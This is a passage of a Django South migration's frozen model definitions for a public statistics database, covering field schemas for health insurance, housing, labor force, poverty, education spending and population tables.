'pop_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_over_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_over_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_over_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_under_18_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'pop_under_18_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.healthinsurancestateraw': {
'Meta': {'object_name': 'HealthInsuranceStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'geoid': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pop': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_18_34_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_35_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_over_64_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_no_ins_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_private_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public': ('django.db.models.fields.IntegerField', [], {}),
'pop_under_18_public_moe': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.highschooldropouts': {
'Meta': {'object_name': 'HighSchoolDropouts'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.highschoolother': {
'Meta': {'object_name': 'HighSchoolOther'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.housingoccupancystate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'HousingOccupancyState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'occupied_units': ('django.db.models.fields.IntegerField', [], {}),
'occupied_units_moe': ('django.db.models.fields.IntegerField', [], {}),
'occupied_units_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'occupied_units_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_occupied': ('django.db.models.fields.IntegerField', [], {}),
'owner_occupied_moe': ('django.db.models.fields.IntegerField', [], {}),
'owner_occupied_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_occupied_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_vacancy_rate_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_occupied': ('django.db.models.fields.IntegerField', [], {}),
'renter_occupied_moe': ('django.db.models.fields.IntegerField', [], {}),
'renter_occupied_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_occupied_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_vacancy_rate_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total_units': ('django.db.models.fields.IntegerField', [], {}),
'total_units_moe': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'vacant_units': ('django.db.models.fields.IntegerField', [], {}),
'vacant_units_moe': ('django.db.models.fields.IntegerField', [], {}),
'vacant_units_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'vacant_units_percent_moe': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.housingoccupancystateraw': {
'Meta': {'object_name': 'HousingOccupancyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'occupied_units': ('django.db.models.fields.IntegerField', [], {}),
'occupied_units_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'occupied_units_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'occupied_units_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'owner_occupied': ('django.db.models.fields.IntegerField', [], {}),
'owner_occupied_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'owner_occupied_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'owner_occupied_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'owner_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'owner_vacancy_rate_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'renter_occupied': ('django.db.models.fields.IntegerField', [], {}),
'renter_occupied_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'renter_occupied_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'renter_occupied_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'renter_vacancy_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'renter_vacancy_rate_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'total_units': ('django.db.models.fields.IntegerField', [], {}),
'total_units_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'vacant_units': ('django.db.models.fields.IntegerField', [], {}),
'vacant_units_moe': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'vacant_units_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'vacant_units_percent_moe': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.individualeducationprograms': {
'Meta': {'object_name': 'IndividualEducationPrograms'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.kidshealthinsurance': {
'Meta': {'object_name': 'KidsHealthInsurance'},
'all_people': ('django.db.models.fields.IntegerField', [], {}),
'covered': ('django.db.models.fields.IntegerField', [], {}),
'covered_pct': ('django.db.models.fields.FloatField', [], {}),
'covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase': ('django.db.models.fields.IntegerField', [], {}),
'direct_purchase_pct': ('django.db.models.fields.FloatField', [], {}),
'direct_purchase_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'direct_purchase_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt': ('django.db.models.fields.IntegerField', [], {}),
'govt_pct': ('django.db.models.fields.FloatField', [], {}),
'govt_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'govt_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medicaid': ('django.db.models.fields.IntegerField', [], {}),
'medicaid_pct': ('django.db.models.fields.FloatField', [], {}),
'medicaid_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicaid_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare': ('django.db.models.fields.IntegerField', [], {}),
'medicare_pct': ('django.db.models.fields.FloatField', [], {}),
'medicare_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'medicare_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military': ('django.db.models.fields.IntegerField', [], {}),
'military_pct': ('django.db.models.fields.FloatField', [], {}),
'military_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'military_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered': ('django.db.models.fields.IntegerField', [], {}),
'not_covered_pct': ('django.db.models.fields.FloatField', [], {}),
'not_covered_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'not_covered_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private': ('django.db.models.fields.IntegerField', [], {}),
'private_employment': ('django.db.models.fields.IntegerField', [], {}),
'private_employment_pct': ('django.db.models.fields.FloatField', [], {}),
'private_employment_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_employment_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_pct': ('django.db.models.fields.FloatField', [], {}),
'private_pct_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'private_se': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcecounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'LaborForceCounty'},
'county': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.County']"}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employment_total': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force_total': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'laus_code': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'unemployment_total': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcecountyraw': {
'Meta': {'object_name': 'LaborForceCountyRaw'},
'county_fips': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employed': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'laus_code': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'unemployed': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborforcestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'LaborForceState'},
'civilian_noninstitutional_pop': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employment_pop_rate': ('django.db.models.fields.FloatField', [], {}),
'employment_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force_participation_rate': ('django.db.models.fields.FloatField', [], {}),
'labor_force_total': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {}),
'unemployment_total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
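        # As a reading aid, the 'data.laborforcestate' entry above unfreezes to
        # roughly the following model (a sketch inferred from the frozen
        # triples; the app's actual models.py may declare things differently):
        #
        #     class LaborForceState(models.Model):
        #         state = models.ForeignKey('data.State')
        #         year = models.IntegerField()
        #         civilian_noninstitutional_pop = models.IntegerField()
        #         labor_force_total = models.IntegerField()
        #         labor_force_participation_rate = models.FloatField()
        #         employment_total = models.IntegerField()
        #         employment_pop_rate = models.FloatField()
        #         unemployment_total = models.IntegerField()
        #         unemployment_rate = models.FloatField()
        #         create_date = models.DateTimeField(auto_now_add=True)
        #         update_date = models.DateTimeField(auto_now=True)
        #
        #         class Meta:
        #             unique_together = (('year', 'state'),)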
'data.laborforcestateraw': {
'Meta': {'object_name': 'LaborForceStateRaw'},
'area': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'area_fips': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'civilian_noninstitutional_pop': ('django.db.models.fields.IntegerField', [], {}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'employment_pop_rate': ('django.db.models.fields.FloatField', [], {}),
'employment_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'labor_force_participation_rate': ('django.db.models.fields.FloatField', [], {}),
'labor_force_total': ('django.db.models.fields.IntegerField', [], {}),
'unemployment_rate': ('django.db.models.fields.FloatField', [], {}),
'unemployment_total': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
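        # Convention visible throughout this freeze: each '*Raw' model stores
        # geography as plain CharFields exactly as loaded from the source file
        # (e.g. 'state', 'area', '*_fips'), while its cleaned counterpart swaps
        # in a ForeignKey to orm['data.State'] (and orm['data.County'] where
        # applicable) and adds a unique_together constraint on (year, geography).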
'data.laborunderutilizationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'LaborUnderutilizationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'u1': ('django.db.models.fields.FloatField', [], {}),
'u2': ('django.db.models.fields.FloatField', [], {}),
'u3': ('django.db.models.fields.FloatField', [], {}),
'u4': ('django.db.models.fields.FloatField', [], {}),
'u5': ('django.db.models.fields.FloatField', [], {}),
'u6': ('django.db.models.fields.FloatField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.laborunderutilizationstateraw': {
'Meta': {'object_name': 'LaborUnderutilizationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'u1': ('django.db.models.fields.FloatField', [], {}),
'u2': ('django.db.models.fields.FloatField', [], {}),
'u3': ('django.db.models.fields.FloatField', [], {}),
'u4': ('django.db.models.fields.FloatField', [], {}),
'u5': ('django.db.models.fields.FloatField', [], {}),
'u6': ('django.db.models.fields.FloatField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.mathsciencespending': {
'Meta': {'object_name': 'MathScienceSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medianhouseholdincomestateraw': {
'Meta': {'object_name': 'MedianHouseholdIncomeStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'median_household_income': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'median_household_income_moe': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'state_fips': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medianincomestate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'MedianIncomeState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'median_household_income': ('django.db.models.fields.FloatField', [], {}),
'median_household_income_moe': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medicaidparticipation': {
'Meta': {'object_name': 'MedicaidParticipation'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.medicareenrollment': {
'Meta': {'object_name': 'MedicareEnrollment'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.migrantstudents': {
'Meta': {'object_name': 'MigrantStudents'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.militarypersonnel': {
'Meta': {'object_name': 'MilitaryPersonnel'},
'civilian_personnel': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'military_personnel': ('django.db.models.fields.IntegerField', [], {}),
'reserve_national_guard_personnel': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.msn': {
'Meta': {'object_name': 'Msn'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msn_code': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'msn_desc': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'msn_unit': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.nativeedspending': {
'Meta': {'object_name': 'NativeEdSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.ncesschooldistrict': {
'Meta': {'object_name': 'NcesSchoolDistrict'},
'congress_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'county_code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'county_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'district_code': ('django.db.models.fields.CharField', [], {'max_length': '6'}),
'district_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'state_code': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'data.newaidscases': {
'Meta': {'object_name': 'NewAidsCases'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.otherfederalrevenue': {
'Meta': {'object_name': 'OtherFederalRevenue'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '16'})
},
'data.peoplepovertystate': {
'Meta': {'object_name': 'PeoplePovertyState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'percent_standard_error': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'total_population': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'value_standard_error': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.peoplepovertystateraw': {
'Meta': {'object_name': 'PeoplePovertyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'percent_standard_error': ('django.db.models.fields.DecimalField', [], {'max_digits': '5', 'decimal_places': '2'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total_population': ('django.db.models.fields.IntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'value_standard_error': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.populationagecounty': {
'Meta': {'unique_together': "(('year', 'state', 'county'),)", 'object_name': 'PopulationAgeCounty'},
'age_0_19': ('django.db.models.fields.IntegerField', [], {}),
'age_0_19_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_0_4': ('django.db.models.fields.IntegerField', [], {}),
'age_0_4_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_10_14': ('django.db.models.fields.IntegerField', [], {}),
'age_10_14_percent': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'age_15_19': ('django.db.models.fields.IntegerField', [], {}),
